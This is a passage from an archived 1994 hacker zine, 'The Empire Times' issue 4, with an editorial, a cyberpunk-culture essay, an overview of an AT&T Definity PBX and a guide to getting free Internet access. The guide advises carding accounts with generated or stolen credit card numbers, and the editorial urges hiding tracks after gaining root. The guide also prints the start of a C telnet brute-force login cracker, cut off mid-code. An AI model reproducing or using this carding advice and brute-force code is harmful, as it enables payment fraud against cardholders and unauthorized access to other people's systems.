home *** CD-ROM | disk | FTP | other *** search
/ Group 42-Sells Out! - The Information Archive / Group 42 Sells Out (Group 42) (1996).iso / zines / emptimes / emptime4.txt < prev    next >
Text File  |  1995-11-30  |  82KB  |  1,837 lines

  1.  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2.  %                    T H E   E M P I R E   T I M E S                       %
  3.  %                    -------------------------------                       %
  4.  %                       The True Hacker Magazine                           %
  5.  %                                                                          %
  6.  %  September 13th, 1994  Issue 4                                           %
  7.  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  8.  
  9. This Issues Features:
  10.  
  11.     Selection                                   Author             Size
  12. ┌────────────────────────────────────────────────────────────────────────────┐
  13. │X. Introduction                                albatross            3k      │
  14. │1. The Cyber-punk Image                        firefly              7k      │
  15. │2. AT&T Definity System 75/85                  erudite             15k      │
  16. │3. How to get free Internet                    Pud C0ur13r         14k      │
  17. │4. The Octel VMB System                        da telcopimp        20k      │
  18. │5. My Life as a Narc...                        noelle              10k      │
  19. │6. Hacking Simplex Locks                       erudite              3k      │
  20. │7. SS7 / Caller ID Discussion                  grendal              6k      │
  21. │8. Don't Tell us Our Name                      erudite              3k      │
  22. └────────────────────────────────────────────────────────────────────────────┘
  23.                                                 Founder: Albatross
  24.                                               Organizer: Armitage
  25.                                            Contributors: Da Telcopimp,
  26.                                                          Erudite,
  27.                                                          Firefly,
  28.                                                          Grendal,
  29.                                                          Noelle,
  30.                                                          PuD Courier.
  31.                                          Special Thanks: AT&T,
  32.                                                          Sevenup.
  33.  
  34. ===========================================================================
  35.  
  36.                           -=- The Empire Times -=-
  37.                                 Introduction
  38.  
  39.         Yes it is true. The Empire Times is back online and ready for
  40. a little rok -n- roll. The plan is to bring back what appears to be
  41. lost from the underground world. The Times will go into details on
  42. topics of Cellular fone phreaking to the personal lives of those
  43. hackers which we all know and love.
  44.  
  45.         I believe this issue will spark the intrest of those who have
  46. become cyber-potatoes and those who have yet to realize what a UNIX
  47. system is all about.
  48.  
  49.         It is time for the Hacker Klan to unite and share information
  50. so that we can expand our realm of control over the growing InterNet
  51. which we love so much. Just think how much money is spent to keep us
  52. out of systems which (as we all know) never works. I have always believed
  53. that if there is a way for a regular user to access a system, then
  54. there is a way in.
  55.  
  56.         Always use your brain as to the capablities of the agencies
  57. which are our to stop us, such as the FBI, S.S., and the Military.
  58. When obtaining 'root' at sites, always remember to hide your tracks
  59. into the system. Check for log files, see what wrappers and possible
  60. cron jobs which might be running to catch you. Those who prevail shall
  61. always be known as 'Elite'. Those who fail just didn't learn the tricks
  62. of the trade fast enough.
  63.  
  64.         Just remeber that we are building a MAFIA on the InterNet, if
  65. you want it to succeed, then YOU know what has to be done. So keep
  66. your minds growing and those electrons flowing.
  67.  
  68. Last words
  69. ==========
  70.  
  71. To the Virginia Crue:   If the South is to rise again, Ya'll are
  72.                         the ones that'll do it.
  73.  
  74. To the Maryland Crue:   We have more Net access than any state.
  75.                         Make sure that ya'll keep it like that.
  76.                         Smoke it like a NeckBone.
  77.  
  78. To the D.C. Crue:       I've never see so many hacked outdials and
  79.                         PBX's. Keep it that way. Don't 4 get your 9mm.
  80.  
  81.  
  82.  
  83. "I'm only trying to build an Empire."
  84.  -Alby
  85.  
  86.  
  87. ==============================================================================
  88.  
  89.                           -=- The Empire Times -=-
  90.                        Volume 2, Issue 4, File 1 of 8
  91.                              The Cyberpunk Image
  92.                                  by firefly
  93.  
  94.         There's a new flick that they are showing at schools in the area this
  95. year. It's one of those documentaries that is produced exclusively for
  96. educators that targets a certain culture and proceeds to slander against it.
  97. "Cyberpunk" is such a movie. I had the unfortunate luck to sit through it in
  98. a general education program in college last semester. That was bad enough
  99. ...but then I had to show it to a class this summer and then spark discussion
  100. about it when I disagreed with the entire theme of the movie!
  101.  
  102.         The movie "Cyberpunk" was a documentary that showed the use of
  103. computers and continued the media's hype of the so-called "cyberculture".
  104. The film was well-done, and well-organized, but I disagree with what I
  105. consider are the film's themes about the "computer generation"
  106. (a.k.a.: cyber-punks). Not to mention the fact it was written entirely in
  107. "computer-esque" with techno music, rapid-picture imagery, and other
  108. "information age" fads. This paper will discuss the term "cyberpunk" itself,
  109. offer observations about this culture, and conclude with the true nature of
  110. the computer generation.
  111.  
  112.         The term cyberpunk, coined by William Gibson in his Neuromancer book,
  113. is a literary and now, thanks to the media, an overused term used to describe
  114. every type of "console cowboy" from a computer programmer to a malicious
  115. electronic explorer, to someone who sees a Gibson-esque future run by
  116. computers, to someone who dresses in leather, and carries a digital pager.
  117. The term "punk" usually refers to someone against the current cultural norms
  118. of society. The so-called cyberpunks are considered the small segment of
  119. society that is against the current norms of "regular people". Well, the
  120. truth of the matter is that these "cyber-dudes" have grown up around
  121. computers, digital games, and electronic tools in the classroom and workplace.
  122. Is it their fault that computers have simplified many redundant tasks in
  123. society? Is it these people's fault that computers now help fly aircraft,
  124. make cars, improve international communication? NO!
  125.  
  126.         This computer generation is simply the first generation to pioneer
  127. such a radically new concept of existence. While our forefathers saw things
  128. in a linear perspective, we see them in a virtual reality that can be changed
  129. into a nonlinear environment depending on our virtual vantage point. Timothy
  130. Leary would say this is "consciousness-expansion".  Consider your parents and
  131. the advent of television or the superhighway across your home state.  Your
  132. parents saw it as revolutionary, and possibly frightening that automobiles
  133. could "drive" in 6-8 lanes of 55mph traffic across the nation. They probably
  134. saw the political and Orwellian problems with having a video receiver in their
  135. living rooms that could broadcast political messages. But they adapted and
  136. grew up with it, while their parents looked on in amazement. The same holds
  137. true with the electronic age. My generation grew up with Atari, Apple,
  138. Windows, and modems. We are used to "driving" with multiple pathways
  139. simultaneously -- parallel processing -- our lives, and utilizing the vast
  140. speed that information or data takes these days to further advance ourselves.
  141.  
  142.         This illustrates how those in power of any sort -- political, literary,
  143. media, business -- see this generation, as a band of people who use strange
  144. things to live their lives. Well, the television was strange to my
  145. grandmother, but she adapted -- as my mother grew up with it --, and so will
  146. this generation of leaders adapt as our generation of people grow up with
  147. computers. The difference with this computer generation is that we deal with
  148. so much information at such a rapid pace, that those who look on us (ie,
  149. policymakers and journalists) cannot keep up with it...hence the fear of what
  150. they don't know. "Cyberpunk" sounds evil. The unknown is evil. Therefore,
  151. since nobody understands the cyber-culture, those that do are therefore evil.
  152. Simple societal algebra.  The movie is full of stereotypes. Firstly, there is
  153. no cyberpunk standard for music. People think techno is the music of the
  154. computer age because it is fast and computer-generated. False. Granted, many
  155. people who like techno like computers, but a history book of 2020 should not
  156. show the 1990s' cyber-culture liking techno in the same way as 18th century
  157. victorians enjoyed the waltz. Outstanding on-line magazine UXU-148
  158. Technophilia mentions that the cyber-culture likes any form of music, and
  159. not only computer-generated tunes. I associate with hackers, and people the
  160. media calls "cyberpunks". Our music ranges from hard rock and metal to movie
  161. soundtracks to top forty to reggae, and some techno. Yet, throughout the
  162. movie, viewers are led to believe that fast techno is the "music of the
  163. cyberpeople." Granted, a "rave" is an all-night computer-controlled techno
  164. event is the climactic part of being a part of a cyberculture, but not
  165. symbolic of the entire culture of computer-users.
  166.  
  167.         There was "lotsa leather". Again, another stereotype. True, the
  168. classic street punk wore combat boots and a leather jacket, but to imply that
  169. this is how an entire subculture dresses is absurd! To dispel this myth, and
  170. meet the movie on its own level of stereotyping, go to any rave, which many
  171. consider the climactic event in the cyberculture. The fashion ranges from the
  172. sublime to the ridiculous, from exotic to erotic, from jeans and T-shirts to
  173. leather and handcuffs. Mostly people dress the way they go to a dance club.
  174. The people they interviewed in the movie were interviewed at a convention,
  175. or another public place, where they are dressing to make an impression. Just
  176. because someone wears leather at a convention or on a documentary tape does
  177. not mean he/she represents the entire culture being profiled, or that the
  178. person dresses like that regularly. I know of very few hard-core cyber-kids
  179. who dress that way. I frequently wear shorts, jeans, t-shirts and turtlenecks.
  180. Part of my accessories is a pager and ATM card. Gee. According to Cyberpunk,
  181. I cannot be a member of the cyberculture, since I don't own a leather jacket
  182. or have long hair.
  183.  
  184.         Enough ranting. I've got better things to do. But I just thought it
  185. interesting that this flick is shown as an (and meant to be an) " objective
  186. educational tool" to college students to show them about computers and
  187. society, but portrays them as evil, conniving thugs.
  188.  
  189.  
  190. Votes on next topic: Business Intelligence? or Social Engineering?
  191.  
  192.  
  193. ==============================================================================
  194.  
  195.                          -=- The Empire Times -=-
  196.                       Volume 2, Issue 4, File 2 of 8
  197.                          AT&T Definity System 75/85
  198.                                by erudite
  199.  
  200.                      ================================
  201.                         AT&T Definity System 75/85
  202.                            Communications System
  203.                         Description & Configuration
  204.                      ================================
  205. =====
  206. Intro
  207. =====
  208.  
  209. Let me introduce you to the AT&T Definity System 75/85.  This communications
  210. system is a product of the merging of the AT&T System 75 and System 85
  211. architectures.  The name Definity came from the two words "definitive" and
  212. "infinity".
  213.  
  214. Let me also tell you that there are many different communications systems
  215. out there. (Merlins, AT&Ts) Many many many, I couldnt name them all, but
  216. the AT&T systems are nice.  I enjoy working with them, and I hope you enjoy
  217. this text file.
  218.  
  219. This System is an advanced business communications system.  A Digital
  220. Communications Protocol (DCP) allows data communication through data
  221. terminal equipment connected to the digital switch.  This allows the
  222. system to handle data and voice communications simultaneously.
  223.  
  224. The System can handle up to 1600 lines that supports all digital, hybrid,
  225. and analog terminals and equipment.  Up to 400 trunks, and up to 400
  226. Automatic Call Distribution (ACD) Agents.  The Data switching capacity is up
  227. to 800 digital data endpoints■, and 160 integrated and combined pooled modem
  228. facilities.
  229.  
  230. ■ Digital Data Endpoints include the following:
  231.   ■ 510D Personal Terminal or 515-Type Business Communications Terminal
  232.   ■ 7404D Terminals
  233.   ■ 7406D or 7407D Equipped with optional Data Module Base
  234.   ■ Asynchronous Data Units (ADU) (DCE type device that has rs232c interface)
  235.   ■ Digital Terminal Data Modules
  236.   ■ 3270 Data Modules
  237.   ■ Internal Data Channels
  238.   ■ Trunk Data Modules (Modular)
  239.   ■ Processor Data Modules (Modular)
  240.  
  241. ==========
  242. Networking
  243. ==========
  244.  
  245. The Processor Port Network (PPN) always provides the switch processing
  246. element (SPE) and port circuits.  An Expansion Port Network (EPN) is
  247. available to increase line size of any system by allowing you to add
  248. additionnal port circuits.  The EPN connects to the PPN over a fiber
  249. optic cable that may be up to 1.86 miles remotely situated.  It may also
  250. by located adjacent to the PPN.
  251.  
  252. This System may be arranged stand-alone or you can integrate it into a
  253. private network.  You can form these types of Networks:
  254.         ■ Tandem Tie Trunk Network (TTTN)
  255.         ■ Electronic Tandem Network (ETN)
  256.         ■ Main/Satellite Configuration
  257.         ■ Distributed Communications System (DCS)
  258.         ■ Centralized Attendant Service (CAS)
  259.  
  260. An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI)
  261. makes it possible for the Definity System to access various private and
  262. public network services.  With ISDN-PRI the you can access these services:
  263.         ■ Call by Call Service Selection
  264.         ■ Private Network Services
  265.         ■ Information Forwarding
  266.         ■ Call Identification Display
  267.           - Connected Number Display
  268.           - Connected Party Name Display
  269.           - Calling and Called Number Record Display
  270.           - Calling and Called Party Name Display
  271.  
  272. =============
  273. Configuration
  274. =============
  275.  
  276. The Actual System is encased in a pair of "cabinets" which have a fiber
  277. optic link between them.  It is also common to have a stack of about three
  278. "cabinets" of a smaller size, for different models.
  279.  
  280. Shown here is a typical multi-carrier system with a Processor Port Network
  281. (PPN) cabinet and Expansion Port Network (EPN) cabinet.
  282.  
  283.   attendant          outside trunks   _____ outside private line
  284.    consoles            and lines    /        data transmission equipment or
  285.       \                      \    /          analog switched network
  286.         \      fiber optic    |  |
  287.          |      connetion     |  |         __ business communication
  288.         -+---------/~\--------+--+       /    terminals
  289.        |   AT&T    | |   AT&T    |      |
  290.        | DEFINITY  | | DEFINITY  +------'                      ___data
  291.     ---+  SYSTEM   | |  SYSTEM   +--------<>------[audix]    /    terminals
  292.   /    |  75/85    | |  75/85    |   modular data          /
  293.  |     |___________| |__________+|     processor     ____ |
  294. manager   |   |                 |                   |    +'optional host
  295. terminal  |   |                 +-------<>----------+    | computer or call
  296.          /    +-------[]-----+,                     |____| management system
  297.        /         asynchronous |
  298.   single line     data unit    \__ data
  299. voice terminals                    terminals
  300.  
  301.  
  302. ===================
  303.   Voice and Data
  304. Management Features
  305. ===================
  306.  
  307. There are alot of voice features and services, in fact, too many to list, I
  308. will do a run down on all the interesting and useful features and services.
  309. It has many Voice Management, Data Management, Network Services, System
  310. Management, Hospitality Services, and Call Management Services.
  311.  
  312. ■ Attendant Display: Contains useful call related information that the
  313.   call attendant can use to operate the console more efficiently
  314. ■ Audio Information Exchange Interface (AUDIX): This interface allows
  315.   both inside system users and remote callers to edit, recieve, send,
  316.   write, and forward voice messages.
  317. ■ Authorization Codes: A means to control user privileges throughout the
  318.   system.
  319. ■ Automatic Incoming Call Display: Shows identity of remote caller and relays
  320.   it to the display console.
  321. ■ Class of Restriction: Defines up to 64 classes of user restriction.
  322. ■ Conference Service
  323.   - Attendant Conference: Allows Attendant to construct a conference call
  324.   - Terminal Confernce: Allows remote user to construct a conference call
  325.     without attendant assistance.
  326. ■ Data Privacy: This, when activated by user, protects analog data calls from
  327.   being interrupted by any of the systems overriding features, and denies
  328.   ability to gain access to, and or superimpose tones.
  329. ■ Data Restriction: This feature is the same as Data Privacy, except that it
  330.   is issued by the administrator to a certain extension # for indication of
  331.   a dedicated private data extension.
  332. ■ DCS Call Forwarding All Calls: This is the voice forwarding service.
  333. ■ DCS Distinctive Ringing: This is simply a distinctive ringing feature.
  334. ■ Dial Access: This is simply the package of features that allows anyone in
  335.   the system to dial anyone else, such as the attendant console.
  336. ■ DS1 Tie Trunk Service: This service provides a digital interface for
  337.   the following trunks and more.
  338.         ■ Voice Grade DS1 Tie Trunks
  339.         ■ Alternative Voice/Data (AVD) DS1 Tie Trunks
  340.         ■ Digital Multiplexed Interface (DMI) Tie Trunks
  341.         ■ Central Office (CO) Trunks
  342.         ■ ISDN-PRI Trunks
  343.         ■ Remote Access Trunks
  344.         ■ Wide Area Telecommunications Service (WATS) Trunks
  345. ■ Facility Test Calls: Provides voice terminal user who is capable of all
  346.   features and functions that is used for maintenance testing.  Such as access
  347.   to system tones, access to specific trunks, etc.
  348.         Note: AT&T designed the Facility Test Calls Feature for testing
  349.               purposes only, and system maintenance.  When properly
  350.               administered, AT&T claims that the customer is responsible for
  351.               all security items, and secure system from unauthorized users,
  352.               and that all users should be aware of handling access codes.
  353.               AT&T claims they will take no responsibility for poor
  354.               administration.
  355. ■ Hunting: The internal hunting feature is very nice, as you probably know,
  356.   it rings down if busy, or if it recieves a dial timeout.
  357. ■ Information System Network Interface (ISN): AT&T ISN is a
  358.   packet switched local area network that will link with mainframes,
  359.   workstations, personal computers, printers, terminals, storage devices,
  360.   and communication devices.
  361. ■ Integrated Services Digital Network Primary Rate Interface (ISDN-PRI):
  362.   This interface allows connection of the system to an ISDN Network by means
  363.   of ISDN frame format called PRI.
  364. ■ Inter-PBX Attendant Calls: Positions for more than one branch, and each
  365.   branch has a Listed Directory Number (LDN).
  366. ■ Modem Pooling: Switches connections of digital data endpoints.
  367. ■ Network Access (Private): Connect to the following Networks
  368.         ■ Common Control Switching Arrangement (CCSA)
  369.         ■ Electronic Tandem Network (ETN)
  370.         ■ Enhanced Private Switched Communications Service (EPSCS)
  371.         ■ Tandem Tie Trunk Network (TTTN)
  372.         ■ Software Defined Network (SDN)
  373. ■ Network Access (Public): Access to public networks.
  374. ■ Privacy: Protects from others bridging into their extensions.
  375. ■ Remote Access: This lets you access the system remotely, again, AT&T
  376.   doesnt want to take responsibility for anything that is abused with this
  377.   feature.
  378. ■ Restrictions: There is a large list of restriction features that I'm sure
  379.   would come in handy.
  380. ■ Service Observing: Allows high access users to monitor
  381.   others calls, again, AT&T does not want to take any legal fees on missuse
  382.   on this feature.
  383. ■ Transfers: Allows any user to do an attendant call transfer without an
  384.   attendant's assistance.
  385.  
  386. ========
  387. Software
  388. ========
  389.  
  390. The System comes with swithced services software, administrative software,
  391. and maintenance software.  All running on a real-time operating system.
  392.  
  393. ■ Switched Services Software: This Software provides all the calling features
  394.   and services.  This also is responsible for relaying any information to the
  395.   console display.
  396. ■ Administrative Software: This Software is needed to run administrative
  397.   tasks, and configurations.
  398. ■ Maintenance Software: The Maintenance Software is used to
  399.   keep everything running properly.
  400.  
  401. =====================
  402. System Administration
  403. =====================
  404.  
  405. The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit
  406. number. The pound (#) and star (*) keys can be used as the first digit of the
  407. code.  Below you will see a typical Screen Format taken from one of my logs,
  408. information aside you can see what the administration Screens look and feel
  409. like.
  410.  
  411. --------------------------------------------------------------------
  412.                                                        Page 1 of 4
  413.  
  414.                                STATION
  415.  
  416. Extension: ____
  417. Type: _____       Lock Messages: _      COR: _     Room: _____
  418. Port: ___________ Security Code: ____   COS: _     Jack: _____
  419. Name: ___________ Coverage Path: ___              Cable: _____
  420.  
  421. FEATURE OPTIONS
  422.  
  423.     LWC Reception? _____  Headset? _  Coverage Msg Retrieval? _
  424.    LWC Activation? _  Auto Answer? _        Data Restriction? _
  425.  Redirect Notification? _        Idle Appearance Preferences? _
  426. PCOL/TEG Call Alerting? _
  427.            Data Module? _           Restrict Last Appearance? _
  428.                Display? _
  429.  
  430. ABREVIATED DIALINGS
  431.  
  432.         List1: _____        List2: _____        List3: _____
  433.  
  434. BUTTON ASSIGNMENTS
  435.  
  436. 1: _______                     6: _______
  437. 2: _______                     7: _______
  438. 3: _______                     8: _______
  439. 4: _______                     9: _______
  440. 5: _______
  441.  
  442.  
  443. -------------------------------------------------------------------
  444.  
  445. ==================
  446. System Maintenance
  447. ==================
  448.  
  449. Finally the Maintenance section, where you can see where the errors are
  450. logged, where all the alarms are sent, printed, etc.
  451.  
  452. There are 3 different types of alarms:
  453. ■ Major Alarms (Critical Damage, requires immediate attention)
  454. ■ Minor Alarms (Errors, still operable, requires action)
  455. ■ Warning Alarms (no noticeable degradation of service, not reported to
  456.   console or INADS)
  457.  
  458. The Error log is reported and can be viewed at The Manager Terminal,
  459. as well as the alarm log.
  460.  
  461. ==============
  462. Basic Acronyms
  463. ==============
  464.  
  465. ADU     Asynchronous Data Unit
  466. AUDIX   Audio Information Exchange
  467. COR     Class of Restriction
  468. COS     Class of Service
  469. DCP     Digital Communications Protocal
  470. DMI     Digital Multiplexed Interface
  471. EPN     Expansion Port Network
  472. ISDN    Integrated Service Digital Network
  473. PPN     Processor Post Network
  474. PSDN    Packet Switching Data Network
  475.  
  476. =====
  477. Tones
  478. =====
  479.  
  480. Here is most of the Tones, mostly either interesting ones or oftenly used
  481. tones the System.  Here are the tones, the frequencies, and the moderations.
  482.  
  483. Tone                   Frequency          Pattern
  484. ----                   ---------          -------
  485. Answer Back 3          2225 Hz            3000 on
  486. Answer Back 5          2225 Hz            5000 on
  487. Bridging Warning       440 Hz             1750 on, 12000 off,
  488.                                           650 on; repeated
  489. Busy                   480 Hz + 620 Hz    500 on, 500 off; repeated
  490. Call Waiting
  491.  Internal              440 Hz             200 on
  492.  External              440 Hz             200 on, 200 off
  493.  Attendant             440 Hz             200 on, 200 off
  494. Priority Call          440 Hz             200 on, 200 off, 200 on,
  495.                                           200 off, 200 on
  496. Call Waiting
  497.  Ring Back             440 Hz + 480 Hz;   900 on (440 + 480)
  498.                        440 Hz             200 on (440) 2900 off; repeated
  499. Cnrt Att Call
  500.  Incoming Call
  501.  Indentification       480 Hz & 440 Hz    100 on (480), 100 on (440),
  502.                        & 480 Hz           100 on silence;
  503.  Dial Zero,
  504.  Attendant Transfer,
  505.  Test Calls,           440 Hz             100 on, 100 off, 100 on
  506.  Coverage              440 Hz             600 on
  507.  Confirmation          350 Hz + 400 Hz    100 on, 100 off, 100 on,
  508.                                           100 off, 100 on
  509.  Dial                  250 Hz + 400 Hz    Continuous
  510.  Executive Override    440 Hz             300 on followed by
  511.  Intercept             440 Hz & 620 Hz    250 on (440),
  512.                                           250 on (620); repeated
  513.  Ringback              440 Hz + 480 Hz    1000 on, 3000 off; repeated
  514.  Zip                   480                500 on
  515.  
  516. =====
  517. Outro
  518. =====
  519.  
  520. ■ This file was based on the statistics for the AT&T Definity
  521.   System 75/85 (multi-carrier cabinet model) communications system.
  522.  
  523. I hope you learned something, anywayz, questions comments, system login
  524. information, defaults, where to get manuals, or anything else.
  525. email me (armitage@dhp.com) and I will get back to you.
  526.  
  527. erudite (armitage on irc)
  528.  
  529.  
  530. ==============================================================================
  531.  
  532.                           -=- The Empire Times -=-
  533.                        Volume 2, Issue 4, File 3 of 8
  534.                      How to Get a Free Internet Account
  535.                                by PuD C0ur13r
  536.  
  537.  
  538.         I know the story.  Your just starting out, and you don't have an
  539. internet account.  And you don't want to pay for one, right?  Well, here are
  540. some tips to getting free internet.
  541.  
  542.  
  543.  
  544. Freenets
  545. ----------------
  546.  
  547.         Oh bleh, you say.  A freenet?!?!@#$  Well, yes, a freenet.  Why not?
  548. You get a mailing address, a gopher, maybe usenet, maybe irc, maybe some
  549. other added features.  Heck, on some freenets you get a shell account.  But
  550. even if you don't get a shell account, there are many ways to get something
  551. of a shell.  Vi, Veronica, gopher, and many other useful little bugs.  This
  552. article is not for telling how to get shell on a freenet, because that would
  553. take up another article. But here are some freenets:
  554.  
  555. telnet to:
  556.  
  557. leo.nmc.edu                login: visitor
  558. yfn.ysu.edu                login: visitor
  559. freenet.scri.fsu.edu       login: visitor
  560. freenet.carleton.edu       login: guest
  561. freenet.victoria.bc.ca     login: guest
  562. freenet.lorain.oberlin.edu login: guest
  563. freenet.hsc.colorado.edu   login: guest
  564. bigcat.missouri.edu        login: guest
  565. garbo.uwasa.fi             login: guest
  566. ids.net                    login: guest
  567. bbs.augsburg.edu           login: guest
  568. tpe.ncm.com                login: guest
  569. michael.ai.mit.edu         login: guest
  570. bbs.isca.uiowa.edu         login: guest/new
  571. phred.pc.cc.cmu.edu 8888   login: guest/new
  572. muselab.ac.runet.edu       login: bbs   (send mail to 'gabe' to access irc)
  573. netaxs.com                 login: bbs
  574. shadow.acc.iit.edu         login: bbs
  575. bbs.augsburg.edu           login: bbs
  576. utbbs.civ.utwente.nl       login: bbs
  577. oscar.bbb.no               login: bbs
  578. bugs.mty.itesm.mx          login: bbs
  579. tudrwa.tudelft.nl          login: bbs
  580. ara.kaist.ac.kr            login: bbs
  581. cc.nsysu.edu.tw            login: bbs
  582. cissun11.cis.nctu.edu.tw   login: bbs
  583. badboy.aue.com             login: bbs
  584. tiny.computing.csbsju.edu  login: bbs
  585. Quartz.rutgers.edu         login: bbs
  586. bbs.fdu.edu                login: bbs
  587. paladine.hacks.arizona.edu login: bbs
  588. freedom.nmsu.edu           login: bbs
  589. kids.kotel.co.kr           login: bbs
  590. wariat.org                 login: bbs
  591. seabass.st.usm.edu         login: bbs       pass: bbs
  592. heartland.bradley.edu      login: bbguest
  593. freenet-in-a.cwru.edu      login: <none>
  594. oubbs.telecom.uoknor.edu   login: <none>
  595. chop.isca.uiowa.edu        login: <none>
  596. pc2.pc.maricopa.edu 4228   login: <none>
  597. af.itd.com 9999            login: <none>
  598. hpx6.aid.no                login: skynet
  599. launchpad.unc.edu          login: launch
  600. atl.calstate.edu           login: apa
  601. forest.unomaha.edu         login: ef
  602. cue.bc.ca                  login: cosy
  603. softwords.bc.ca            login: cosy
  604. vtcosy.cns.vt.edu          login: cosyreg
  605. Nebbs.nersc.gov            login: new
  606. Milo.ndsu.nodak.edu        login: new       pass: new
  607. tolsun.oulu.fi             login: box
  608. mono.city.ac.uk            login: mono      pass: mono
  609. newton.dep.anl.gov         login: cocotext
  610. kometh.ethz.ch answer at prompts: #         call c600
  611.                               TERMSERV      call avalon
  612.                               login:        bbs
  613.  
  614.  
  615. Va Pen or School Internet
  616. ----------------------------
  617.  
  618.         I know that in Virginia, there is a semi-internet provider called
  619. Va Pen.  I call it semi, because only teachers usually get a shell account.
  620. And the account will only last for a year, so then you have to subscribe for
  621. the account again.
  622.         Also, your school might have some kind of internet feed.  Try hooking
  623. up with that in any way possible.
  624.  
  625.  
  626. Card an Account
  627. -------------------
  628.  
  629.         There isn't much to be said on this.  For Delphi, all you usually
  630. need is a Credit Card Number Generator of some sort.  The account will
  631. probably only last about a day, but you can do it as many times as you want.
  632. If you have a real CC number, with real name and address, then you will have
  633. a semi-legit account, but that will probably only last untill that person
  634. your carding gets his or her bill.  :-)  Experiment.  Call up your local
  635. provider, and try carding it.  Chances are, it will work.
  636.  
  637.  
  638. Decservers
  639. -----------------
  640.  
  641.         Some decservers are hooked up to the internet.  The only way you
  642. can find them is to scan for them.  When you do find a decserver or two, do
  643. 'show services' command.  If you see anything that is remotely related to
  644. 'telnet' or 'rlogin' then play around with it.  You might be able to telnet
  645. to a site on the internet.
  646.  
  647.  
  648. 1800 Internet
  649. -----------------
  650.  
  651.         There are two kinds of 1800 Internet.  One is a 1800 number that
  652. is kind of like a decserver, except its not.  It lets you telnet like a
  653. decserver though, but it only lets you use IP numbers.  I have only played
  654. around with a very few of these "decservers", because 1800 have ANI. And
  655. this kind of telnet gets used to hell, so it doesn't last very long.  One
  656. person I knew got called by the authorities for using a 1800 "decserver".
  657. But its not really illegal to use, because you didn't have to hack it, or
  658. login into it.  Its just there.  But I wouldn't take that legal advice to
  659. heart, though.
  660.         Another kind of 1800 Internet is where you can call up a unix and
  661. get an account through the 1800 number.  Delphi has this, as does IIA.org.
  662. Cyberspace.net's number used to be 1800-833-6378, but I hear that it is
  663. down.
  664.  
  665.  
  666. A Plain Hacking Good Time.
  667. ------------------------------
  668.  
  669.         Brute it away baby.  You could also take that delphi account you just
  670. carded, finger a site, and brute it that away.  Bruting works about 2% of the
  671. time now, but this script will brute for you.
  672.  
  673.  
  674. /*
  675. ######################################
  676. #  Unix telneting brute force hacker #
  677. ######################################
  678. */
  679.  
  680. #include <stdio.h>
  681. #include <sys/wait.h>
  682. #include <signal.h>
  683.  
  684. /*
  685. ########################################
  686. #  Set this according to the path and  #
  687. #  filename where telnet is located    #
  688. ########################################
  689. */
  690.  
  691. #define TELNETPATH "/usr/ucb/telnet"
  692.  
  693. /*
  694. ##############################################################
  695. #  The Following are set to default on a SunOs login format. #
  696. #  You may need to change these for other systems.           #
  697. ##############################################################
  698. */
  699.  
  700. #define LOGINSTRING  "login:"
  701. #define PASSSTRING   "Password:"
  702. #define GOTONESTRING "Last login"
  703.  
  704. /*
  705. ######################################################
  706. #  You won't need to edit anything after this point  #
  707. ######################################################
  708. */
  709.  
  710.  
  711. #define GETC(c)  read(readfd,&(c),1)    /* Functions to read and write pipe */
  712. #define PUTC(c)  write(writefd,&(c),1)
  713. #define PUTS(s)  write(writefd,(s),strlen(s))
  714.  
  715. char    *HOST[80];         /* String: Holds connect to host on telnet */
  716. char    DBUG = 0;            /* Switch: for Debug/Background modes */
  717. char    EOO = 0;             /* Switch: Exit after 1st find */
  718. char    *afilename[80];    /* String: filename to account list */
  719. char    *pfilename[80];    /* String: Holds filename to password list */
  720. char    *ofilename[80];    /* String: Holds filename to output file */
  721. char    account[10];       /* Strings: Hold account/pw for attempts */
  722. char    password[10];
  723.  
  724. FILE *accounts;         /* File pointers */
  725. FILE *passwords;
  726. FILE *found;
  727.  
  728. char    ch;                /* General purpose */
  729. char    buf[800];
  730.  
  731. int     count;
  732. int     p1[2], p2[2];        /* Streams for the process pipe connection */
  733. int     writefd, readfd;     /* Handles for the pipe */
  734.  
  735. /*
  736. ###############################################################################
  737. # Handles the death of the telnet process due to a timeout on connection.     #
  738. # Restarts a telnet process and reconnects to the host                        #
  739. ###############################################################################
  740. */
  741.  
  742. void *death()
  743.  
  744. {
  745.     if (1 == 1) {
  746.  
  747.                     wait3(NULL, WNOHANG, NULL);
  748.                     signal(SIGCLD, death);
  749.                     switch (fork()) {
  750.  
  751.             case 0:
  752.                         dup2(p2[0], 0);
  753.                             dup2(p1[1], 1);
  754.                             execl(TELNETPATH, "telnet", 0);
  755.                             printf("Exec Failed\n");
  756.  
  757.                     default:
  758.                         PUTS(HOST);
  759.                         return;
  760.                 }
  761.         }
  762.             wait3(NULL, WNOHANG, NULL);
  763.             signal(SIGCLD, death);
  764.             return;
  765. }
  766.  
  767. /*
  768. ###########################
  769. # Error exit routine/Help #
  770. ###########################
  771. */
  772.  
  773. void help(parg)
  774.  
  775. {
  776.    printf("\nUsage: %s <address> -a<account list> -p<password list> -o<output>\n", parg);
  777.    printf("Flags:  -d  (Debug/Run in foreground)\n");
  778.    printf("        -1  Exit after first find\n\n");
  779.    exit();
  780. }
  781.  
  782. /*
  783. ########
  784. # MAIN #
  785. ########
  786. */
  787. main(argc, argv)
  788.  
  789. int     argc;
  790. char    **argv;
  791. {
  792.             if (argc == 1)
  793.                 help(argv[0]);
  794.             strcpy(HOST, argv[1]);
  795.             for (count = 2; count != argc; count++) {
  796.                     if (argv[count][0] != '-') {
  797.                             printf("\n:: Invalid Command Line ::\n");
  798.                             help(argv[0]);
  799.                 }
  800.                     ch = argv[count][1];
  801.                     switch (ch) {
  802.                     case 'a':
  803.                         if (!afilename[0])
  804.                                 strcpy(afilename, argv[count] + 2);
  805.                             break;
  806.                     case 'p':
  807.                         if (!pfilename[0])
  808.                                 strcpy(pfilename, argv[count] + 2);
  809.                             break;
  810.                             case 'o':
  811.                         if (!ofilename[0])
  812.                                 strcpy(ofilename, argv[count] + 2);
  813.                             break;
  814.                     case 'd':
  815.                         DBUG = 1;
  816.                             break;
  817.                     case '1':
  818.                         EOO = 1;
  819.                             break;
  820.                     default:
  821.                         printf("\n:: -%c: Unknown option ::\n\n", ch);
  822.                             help(argv[0]);
  823.                 }
  824.         }
  825.             while (!afilename[0]) {
